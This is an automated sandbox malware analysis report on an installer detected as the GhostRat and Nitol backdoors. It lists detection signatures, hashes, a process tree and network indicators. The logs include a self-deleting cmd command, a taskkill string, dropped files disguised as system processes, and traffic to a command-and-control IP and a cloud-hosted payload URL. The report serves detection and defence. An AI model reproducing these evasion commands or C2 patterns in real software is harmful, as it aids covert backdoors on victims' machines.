Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
setup#U67e5#U8be2_pf2024.exe

Overview

General Information

Sample name:setup#U67e5#U8be2_pf2024.exe
renamed because original name is a hash value
Original sample name:setup_pf2024.exe
Analysis ID:1408805
MD5:0b69b1391c949736c21ff137d4183b28
SHA1:754b3f30c29157940b35d865c6c1ebdb2dacb0cb
SHA256:a0e1d31cb9dc7495d9a907d91554c95d9301a75e7a639d300717e77e1ef11d64
Tags:exe
Infos:

Detection

GhostRat, Nitol
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected GhostRat
Yara detected Nitol
C2 URLs / IPs found in malware configuration
Contains functionality to infect the boot sector
Deletes itself after installation
Drops PE files to the user root directory
Drops PE files with benign system names
Machine Learning detection for sample
PE file has a writeable .text section
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
AV process strings found (often used to terminate AV products)
Checks for available system drives (often done to infect USB drives)
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the user directory
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Use NTFS Short Name in Command Line
Sleep loop found (likely to delay execution)
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • setup#U67e5#U8be2_pf2024.exe (PID: 5224 cmdline: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe MD5: 0B69B1391C949736C21FF137D4183B28)
    • Wegame.exe (PID: 5664 cmdline: "C:\users\Wegame\Wegame.exe" MD5: 6B54CAC74E2C36E9A34563018CE99AEA)
    • kill.exe (PID: 5708 cmdline: "C:\users\Statr\kill.exe" MD5: D94C31E9C9C9A1273CC67DC6FFAF9984)
      • conhost.exe (PID: 5536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RuntimeBroker.exe (PID: 3728 cmdline: "C:\ProgramData\RuntimeBroker.exe" MD5: 67EE3B7CA47FEC435EAB6DDE7AAEDCF7)
    • cmd.exe (PID: 6136 cmdline: "C:\Windows\system32\cmd.exe" /c del C:\Users\user\Desktop\SETUP#~1.EXE > nul MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
NitolNo Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.nitol

Malware Configuration

Threatname: GhostRat

{"C2 url": "154.91.65.2"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.3338258450.0000000010011000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_NitolYara detected NitolJoe Security
    00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GhostRatYara detected GhostRatJoe Security
      00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_NitolYara detected NitolJoe Security
        00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GhostRatYara detected GhostRatJoe Security
          00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_NitolYara detected NitolJoe Security
            Click to see the 1 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            6.2.RuntimeBroker.exe.3314c24.1.unpackJoeSecurity_GhostRatYara detected GhostRatJoe Security
              6.2.RuntimeBroker.exe.3314c24.1.unpackJoeSecurity_NitolYara detected NitolJoe Security
                6.2.RuntimeBroker.exe.3314c24.1.unpackMALWARE_Win_NitolDetects Nitol backdoorditekSHen
                • 0x11978:$s2: Applications\iexplore.exe\shell\open\command
                • 0x12ad8:$s3: taskkill /f /im rundll32.exe
                • 0x11024:$s4: \Tencent\Users\*.*
                • 0x11634:$s5: [Pause Break]
                • 0x1187a:$s6: :]%d-%d-%d %d:%d:%d
                • 0x11ac8:$domain: www.xy999.com
                6.2.RuntimeBroker.exe.3520c04.2.raw.unpackJoeSecurity_GhostRatYara detected GhostRatJoe Security
                  6.2.RuntimeBroker.exe.3520c04.2.raw.unpackJoeSecurity_NitolYara detected NitolJoe Security
                    Click to see the 7 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Files With System Process Name In Unsuspected Locations
                    Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe, ProcessId: 5224, TargetFilename: C:\ProgramData\RuntimeBroker.exe
                    Sigma detected: System File Execution Location Anomaly
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\ProgramData\RuntimeBroker.exe" , CommandLine: "C:\ProgramData\RuntimeBroker.exe" , CommandLine|base64offset|contains: , Image: C:\ProgramData\RuntimeBroker.exe, NewProcessName: C:\ProgramData\RuntimeBroker.exe, OriginalFileName: C:\ProgramData\RuntimeBroker.exe, ParentCommandLine: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe, ParentImage: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe, ParentProcessId: 5224, ParentProcessName: setup#U67e5#U8be2_pf2024.exe, ProcessCommandLine: "C:\ProgramData\RuntimeBroker.exe" , ProcessId: 3728, ProcessName: RuntimeBroker.exe
                    Sigma detected: Use NTFS Short Name in Command Line
                    Source: Process startedAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\system32\cmd.exe" /c del C:\Users\user\Desktop\SETUP#~1.EXE > nul, CommandLine: "C:\Windows\system32\cmd.exe" /c del C:\Users\user\Desktop\SETUP#~1.EXE > nul, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe, ParentImage: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe, ParentProcessId: 5224, ParentProcessName: setup#U67e5#U8be2_pf2024.exe, ProcessCommandLine: "C:\Windows\system32\cmd.exe" /c del C:\Users\user\Desktop\SETUP#~1.EXE > nul, ProcessId: 6136, ProcessName: cmd.exe

                    Snort Signatures

                    Timestamp:03/14/24-08:46:09.383883
                    SID:2851179
                    Source Port:49701
                    Destination Port:8000
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 6.2.RuntimeBroker.exe.3520c04.2.raw.unpackMalware Configuration Extractor: GhostRat {"C2 url": "154.91.65.2"}
                    Multi AV Scanner detection for submitted file
                    Source: setup#U67e5#U8be2_pf2024.exeReversingLabs: Detection: 52%
                    Machine Learning detection for sample
                    Source: setup#U67e5#U8be2_pf2024.exeJoe Sandbox ML: detected
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_6BD260AA __EH_prolog3_GS,CryptAcquireContextW,GetLastError,3_2_6BD260AA
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_6BF75150 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,3_2_6BF75150
                    Source: setup#U67e5#U8be2_pf2024.exe, 00000000.00000000.2075450866.000000000049E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_7e90cecb-a
                    Source: setup#U67e5#U8be2_pf2024.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: C:\Users\Statr\kill.exeFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
                    Source: unknownHTTPS traffic detected: 82.156.94.17:443 -> 192.168.2.6:49699 version: TLS 1.2
                    Source: Binary string: D:\build\ob\bora-17171714\bora\build\build\vmui\release\win32\vmware.pdbxx9t source: setup#U67e5#U8be2_pf2024.exe, wm.exe.0.dr
                    Source: Binary string: wextract.pdb source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.dr
                    Source: Binary string: d:\build\ob\bora-1463223\bora-vmsoft\build\release\apps\upgrader\Upgrader.pdb source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.dr
                    Source: Binary string: E:\dailybuild_dev\wegame_client\build\lib\Release\adapt_for_imports.pdb source: setup#U67e5#U8be2_pf2024.exe, adapt_for_imports.dll.0.dr
                    Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 /WX -DL_ENDIAN -DOPENSSL_PIC -D_WIN32_WINNT=0x0501 source: setup#U67e5#U8be2_pf2024.exe, common.dll.0.dr
                    Source: Binary string: d:\build\ob\bora-1463223\bora-vmsoft\build\release\install\InstUtil\tools\toolsinstutil.pdbD source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.dr
                    Source: Binary string: E:\dailybuild_dev\wegame_client\build\lib\Release\common.pdb source: setup#U67e5#U8be2_pf2024.exe, common.dll.0.dr
                    Source: Binary string: E:\dailybuild_dev\wegame_client\build\bin\Release\wegame.pdb source: setup#U67e5#U8be2_pf2024.exe, Wegame.exe.0.dr
                    Source: Binary string: kkeyfuncencryptionPBE2PARAMkeylengthprfPBKDF2PARAMcrypto\asn1\p5_pbev2.ccrypto\evp\p5_crpt2.cassertion failed: keylen <= sizeof(key)crypto\hmac\hmac.ccrypto\pkcs12\p12_key.cxn--compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 /WX -DL_ENDIAN -DOPENSSL_PIC -D_WIN32_WINNT=0x0501 source: Wegame.exe, 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmp
                    Source: Binary string: d:\build\ob\bora-1463223\bora-vmsoft\build\release\apps\setup.pdb source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.dr
                    Source: Binary string: wextract.pdbe\setup\iexpress\wextract\obj\i386\wextract.pdbU source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.dr
                    Source: Binary string: d:\build\ob\bora-1463223\bora-vmsoft\build\release\install\InstUtil\tools\toolsinstutil.pdb source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.dr
                    Source: Binary string: d:\build\ob\bora-1463223\bora-vmsoft\build\release\apps\upgrader9x\Upgrader9x.pdbT} source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.dr
                    Source: Binary string: d:\re\puppet\workspace\8-2-build-windows-i586-cygwin\jdk8u60\4407\build\windows-i586\jdk\objs\policytool_objs\policytool.pdb source: setup#U67e5#U8be2_pf2024.exe, kill.exe.0.dr
                    Source: Binary string: D:\build\ob\bora-17171714\bora\build\build\vmui\release\win32\vmware.pdb source: setup#U67e5#U8be2_pf2024.exe, wm.exe.0.dr
                    Source: Binary string: d:\build\ob\bora-1463223\bora-vmsoft\build\release\apps\setup.pdbHyB source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.dr
                    Source: Binary string: \loaddll\Release\libcef.pdbPkl source: RuntimeBroker.exe, 00000006.00000002.3338332862.000000006C6B3000.00000002.00000001.01000000.0000000F.sdmp
                    Source: Binary string: d:\build\ob\bora-1463223\bora-vmsoft\build\release\install\InstUtil\cacheMod\cacheMod.pdb source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.dr
                    Source: Binary string: \loaddll\Release\libcef.pdb source: setup#U67e5#U8be2_pf2024.exe, libcef.dll.0.dr
                    Source: Binary string: keyfuncencryptionPBE2PARAMkeylengthprfPBKDF2PARAMcrypto\asn1\p5_pbev2.ccrypto\evp\p5_crpt2.cassertion failed: keylen <= sizeof(key)crypto\hmac\hmac.ccrypto\pkcs12\p12_key.cxn--compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 /WX -DL_ENDIAN -DOPENSSL_PIC -D_WIN32_WINNT=0x0501 source: setup#U67e5#U8be2_pf2024.exe, common.dll.0.dr
                    Source: Binary string: d:\build\ob\bora-1463223\bora-vmsoft\build\release\apps\upgrader9x\Upgrader9x.pdb source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.dr
                    Source: Binary string: \loaddll\Release\libcef.pdbP source: setup#U67e5#U8be2_pf2024.exe, libcef.dll.0.dr
                    Source: Binary string: d:\build\ob\bora-1463223\bora-vmsoft\build\release\install\InstUtil\toolsNT\NTinstutil.pdb source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.dr
                    Source: Binary string: E:\dailybuild_dev\wegame_client\build\bin\Release\wegame.pdbhh1GCTL source: setup#U67e5#U8be2_pf2024.exe, Wegame.exe.0.dr
                    Source: Binary string: e\setup\iexpress\wextract\obj\i386\wextract.pdb source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.dr
                    Source: C:\ProgramData\RuntimeBroker.exeFile opened: z:Jump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeFile opened: x:Jump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeFile opened: v:Jump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeFile opened: t:Jump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeFile opened: r:Jump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeFile opened: p:Jump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeFile opened: n:Jump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeFile opened: l:Jump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeFile opened: j:Jump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeFile opened: h:Jump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeFile opened: f:Jump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeFile opened: b:Jump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeFile opened: y:Jump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeFile opened: w:Jump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeFile opened: u:Jump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeFile opened: s:Jump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeFile opened: q:Jump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeFile opened: o:Jump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeFile opened: m:Jump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeFile opened: k:Jump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeFile opened: i:Jump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeFile opened: g:Jump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeFile opened: e:Jump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeFile opened: c:Jump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeFile opened: [:Jump to behavior
                    Source: C:\Users\Statr\kill.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                    Source: C:\Users\Statr\kill.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                    Source: C:\Users\Statr\kill.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                    Source: C:\Users\Statr\kill.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                    Source: C:\Users\Statr\kill.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                    Source: C:\Users\Statr\kill.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                    Source: C:\Users\Statr\kill.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                    Source: C:\Users\Statr\kill.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                    Source: C:\Users\Statr\kill.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                    Source: C:\Users\Statr\kill.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                    Source: C:\Users\Statr\kill.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
                    Source: C:\Users\Statr\kill.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
                    Source: C:\Users\Statr\kill.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                    Source: C:\Users\Statr\kill.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
                    Source: C:\Users\Statr\kill.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                    Source: C:\Users\Statr\kill.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                    Source: setup#U67e5#U8be2_pf2024.exeBinary or memory string: AUTORUN.INF;1RR
                    Source: setup#U67e5#U8be2_pf2024.exeBinary or memory string: autorun.infPX$
                    Source: setup#U67e5#U8be2_pf2024.exeBinary or memory string: autorun.inf:
                    Source: setup#U67e5#U8be2_pf2024.exeBinary or memory string: [autorun]
                    Source: winPre2k.iso.0.drBinary or memory string: AUTORUN.INF;1RR
                    Source: winPre2k.iso.0.drBinary or memory string: autorun.infPX$
                    Source: winPre2k.iso.0.drBinary or memory string: autorun.inf:
                    Source: winPre2k.iso.0.drBinary or memory string: [autorun]
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_00463A3A __EH_prolog3_GS,memset,GetModuleFileNameW,?filename@path@filesystem@ierd_tgp@@QBE?AV123@XZ,?parent_path@path@filesystem@ierd_tgp@@QBE?AV123@XZ,memset,FindFirstFileW,memset,wcsncpy_s,wcsncat_s,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindClose,3_2_00463A3A
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_0045E17A __EH_prolog3_GS,memset,GetEnvironmentVariableW,?get_log_instance@base@@YAPAVILogger@1@XZ,memset,GetModuleFileNameW,wcsrchr,SimpleUString::operator=,memset,GetFileAttributesW,memset,memset,FindFirstFileW,memset,wcscmp,SimpleUString::operator=,wcscmp,wcscmp,FindNextFileW,FindClose,?get_log_instance@base@@YAPAVILogger@1@XZ,3_2_0045E17A
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_0040F650 _invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,memset,FindFirstFileW,wcscpy_s,_invalid_parameter_noinfo_noreturn,3_2_0040F650
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_0045DF3C __EH_prolog3_GS,memset,memset,FindFirstFileW,memset,wcscmp,wcscmp,memset,DeleteFileW,?get_log_instance@base@@YAPAVILogger@1@XZ,GetLastError,FindNextFileW,FindClose,RemoveDirectoryW,?get_log_instance@base@@YAPAVILogger@1@XZ,GetLastError,3_2_0045DF3C
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_005F18B3 FindFirstFileExW,6_2_005F18B3
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_03522164 SHGetSpecialFolderPathA,FindFirstFileA,6_2_03522164
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_10001560 SHGetSpecialFolderPathA,FindFirstFileA,6_2_10001560
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeFile opened: C:\Users\user\AppDataJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeFile opened: C:\Users\userJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 4x nop then push ebx6_2_0352783A

                    Networking

                    barindex
                    Snort IDS alert for network traffic
                    Source: TrafficSnort IDS: 2851179 ETPRO TROJAN PurpleFox Backdoor/Rootkit Checkin M2 192.168.2.6:49701 -> 154.91.65.2:8000
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: 154.91.65.2
                    Source: global trafficTCP traffic: 192.168.2.6:49701 -> 154.91.65.2:8000
                    Source: global trafficUDP traffic: 192.168.2.6:57216 -> 103.7.30.61:8000
                    Source: global trafficUDP traffic: 192.168.2.6:63130 -> 103.7.30.83:8000
                    Source: Joe Sandbox ViewASN Name: IKGUL-26484US IKGUL-26484US
                    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                    Source: global trafficHTTP traffic detected: GET /guofucheng.txt HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)Host: chengwangbaikou-1322151504.cos.ap-beijing.myqcloud.comCache-Control: no-cache
                    Source: unknownTCP traffic detected without corresponding DNS query: 154.91.65.2
                    Source: unknownTCP traffic detected without corresponding DNS query: 154.91.65.2
                    Source: unknownTCP traffic detected without corresponding DNS query: 154.91.65.2
                    Source: unknownTCP traffic detected without corresponding DNS query: 154.91.65.2
                    Source: unknownTCP traffic detected without corresponding DNS query: 154.91.65.2
                    Source: unknownTCP traffic detected without corresponding DNS query: 154.91.65.2
                    Source: unknownTCP traffic detected without corresponding DNS query: 154.91.65.2
                    Source: unknownTCP traffic detected without corresponding DNS query: 154.91.65.2
                    Source: unknownTCP traffic detected without corresponding DNS query: 154.91.65.2
                    Source: unknownTCP traffic detected without corresponding DNS query: 154.91.65.2
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /guofucheng.txt HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)Host: chengwangbaikou-1322151504.cos.ap-beijing.myqcloud.comCache-Control: no-cache
                    Source: unknownDNS traffic detected: queries for: chengwangbaikou-1322151504.cos.ap-beijing.myqcloud.com
                    Source: setup#U67e5#U8be2_pf2024.exe, wm.exe.0.dr, jli.dll.0.dr, libcef.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
                    Source: setup#U67e5#U8be2_pf2024.exe, wm.exe.0.dr, adapt_for_imports.dll.0.dr, Wegame.exe.0.dr, common.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
                    Source: setup#U67e5#U8be2_pf2024.exe, wm.exe.0.dr, adapt_for_imports.dll.0.dr, jli.dll.0.dr, libcef.dll.0.dr, Wegame.exe.0.dr, common.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                    Source: setup#U67e5#U8be2_pf2024.exe, adapt_for_imports.dll.0.dr, Wegame.exe.0.dr, common.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                    Source: setup#U67e5#U8be2_pf2024.exe, jli.dll.0.dr, libcef.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
                    Source: setup#U67e5#U8be2_pf2024.exe, jli.dll.0.dr, libcef.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA.crt0
                    Source: setup#U67e5#U8be2_pf2024.exe, jli.dll.0.dr, libcef.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
                    Source: setup#U67e5#U8be2_pf2024.exe, adapt_for_imports.dll.0.dr, Wegame.exe.0.dr, common.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                    Source: setup#U67e5#U8be2_pf2024.exe, wm.exe.0.dr, jli.dll.0.dr, libcef.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                    Source: setup#U67e5#U8be2_pf2024.exe, adapt_for_imports.dll.0.dr, Wegame.exe.0.dr, common.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                    Source: setup#U67e5#U8be2_pf2024.exe, adapt_for_imports.dll.0.dr, Wegame.exe.0.dr, common.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                    Source: setup#U67e5#U8be2_pf2024.exe, Lua51.dll.0.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0X
                    Source: setup#U67e5#U8be2_pf2024.exe, Lua51.dll.0.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
                    Source: setup#U67e5#U8be2_pf2024.exe, kill.exe.0.dr, RuntimeBroker.exe.0.dr, Lua51.dll.0.dr, winPre2k.iso.0.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                    Source: setup#U67e5#U8be2_pf2024.exe, wm.exe.0.dr, jli.dll.0.dr, libcef.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
                    Source: setup#U67e5#U8be2_pf2024.exe, adapt_for_imports.dll.0.dr, Wegame.exe.0.dr, common.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
